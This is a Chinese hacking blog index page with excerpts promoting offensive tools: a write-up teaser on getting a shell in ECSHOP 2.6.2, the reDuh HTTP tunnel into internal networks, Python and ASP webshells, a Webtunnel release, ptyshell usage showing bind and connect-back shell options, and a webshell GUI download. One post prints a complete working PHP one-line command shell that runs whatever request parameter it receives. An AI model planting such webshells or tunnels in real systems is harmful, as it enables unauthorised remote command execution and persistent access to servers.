鬼仔's Blog

作者：oldjun

ECSHOP是一款开源免费的网上商店系统。由专业的开发团队升级维护，为您提供及时高效的技术支持，您还可以根据自己的商务特征对ECSHOP进行定制，增加自己商城的特色功能。（官方介绍）

ECSHOP前段时间出了个注射漏洞：http://bbs.wolvez.org/topic/67/，拿后台权限应该没有问题，但文章没有提及如何在后台拿shell。昨天可乐在t00ls.Net上发帖问如何拿shell，无聊中我baidu、 google了下，网上貌似没有拿shell的办法。好久没读代码了，无聊中下了ECSHOP最新版（V2.6.2）的源码过来读，很庆幸，给我找到一个可以直接写shell的文件。与注射一样，同样是个变化未初始化导致的问题，于是，同样只能用在register_globals为on的环境下。
阅读全文 »

作者：sai52[B.H.S.T]

国外大牛的作品，偶顺手写了个使用说明。E文好的看原文  http://www.sensepost.com/research/reDuh/

这个工具可以把内网服务器的端口通过http/https隧道转发到本机，形成一个连通回路。用于目标服务器在内网或做了端口策略的情况下连接目标服务器内部开放端口。

本机——-客户端———（http隧道）———–服务端——————内网服务器

服务端是个webshell（针对不同服务器有aspx,php,jsp三个版本），客户端是java写的，本机执行最好装上JDK。
阅读全文 »

来源：Xeye Hack Team

python版的webshell。

1.0版本的功能有：

1、文件、文件夹相关信息统计与操作功能，比如：列、删除、复制、读取、创建等等。
2、服务器信息查看。
3、执行自定义python命令。
4、socket反弹。
阅读全文 »

作者：skyfire[B.H.S.T]

隐藏并修改文件的最后修改时间的asp-webshell。

源码：
阅读全文 »

作者：skyfire[B.H.S.T]

源码：

<?php
/*一个新型的php一句话cmdshell(非一句话木马)
//原理:php运行时如果遇见字符``(键盘上~符号的下档键)总会尝试着执行``里面包含的命令，并返回命令执行的结果(string类型)；
//局限性:特征码比较明显，``符号在php中很少用到，杀毒软件很容易以此为特征码扫描到并警报；``里面不能执行php代码；
//write by skyfire
*/
echo `$_REQUEST[id]`;
?>

阅读全文 »

信息来源：Trace

I’d like to announce the release of Webtunnel 0.0.2, available at http://sourceforge.net/projects/webtunnel.

Webtunnel 0.0.2
Copyright 2009 Janos Szatmary
E-mail: [email protected]
Web: http://webtunnel.sourceforge.net

WHAT’S NEW
阅读全文 »

作者：xi4oyu

[test@localhost tmp]$ ls -l
total 488
-rwxr-xr-x 1 root root 494816 Oct 4 07:08 ptyshell-static
[test@localhost tmp]$ md5sum ptyshell-static
3ea2a909f736660097c0248d403bbe80 ptyshell-static
[test@localhost tmp]$ ./ptyshell-static
ptyshell v0.4
orignal written by wzt ,psexec feature added by xi4oyu
usage: ./ptyshell-static <port> | <remote ip> <port>
./ptyshell-static -u username -p password -c command -pd port
阅读全文 »

来源：鱼化石’s blog

下载地址：webshellphpgui.rar